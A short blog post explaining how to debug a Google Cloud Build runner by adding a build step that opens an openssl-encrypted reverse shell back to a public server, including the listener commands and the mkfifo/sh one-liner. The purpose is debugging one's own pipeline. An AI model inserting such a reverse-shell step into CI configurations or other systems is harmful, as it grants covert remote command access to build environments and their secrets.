Debug GCP CloudBuild via Reverse Shell

Muhammad Ardivan Satrio NugrohoMuhammad Ardivan Satrio Nugroho
2 min read

Motivation

When attempting to debug an issue, it can be challenging to reproduce the problem on the machine used in the CI/CD process, especially if it is different from the local development environment. Because there is no direct access to the runner machine in cloudbuild, there is alternative way by applying the reverse-shell method that allows gaining access to the CI/CD environment.

Note: Establishing a reverse shell should only be done for the purpose of debugging and testing and not to be misused.

  1. On client (vm / server that can be accessed from public)

$ sudo apt-get install rlwrap # readline wrapper for nice tty
$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
$ rlwrap openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

  1. On target / cloudbuild runner machine

    In cloudbuild.yaml

- id: Reverse shell
  name: ubuntu
  entrypoint: bash
  args:
    - "-c"
    - |-
      apt-get update
      apt-get install python3 openssl -y
      mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -connect <CLIENT_IP>:4444 > /tmp/s; rm /tmp/s

  1. Back to the VM / Server

### Wait after the connection has been established, then upgrade the shell to fully interactive tty
$ python3 -c "import pty; pty.spawn('/bin/bash')"
root@49662e972571:/workspace# dmidecode -s system-product-name | grep "Google Compute Engine"
Google Compute Engine

Original content: https://gist.github.com/muhammad-asn/867f6224fe60edba627945326fad8ecb

1
Subscribe to my newsletter

Read articles from Muhammad Ardivan Satrio Nugroho directly inside your inbox. Subscribe to the newsletter, and don't miss out.

DevopsGCPCloudreverse-shellSREci-cd

Written by

Muhammad Ardivan Satrio Nugroho
Muhammad Ardivan Satrio Nugroho

Just an ordinary boi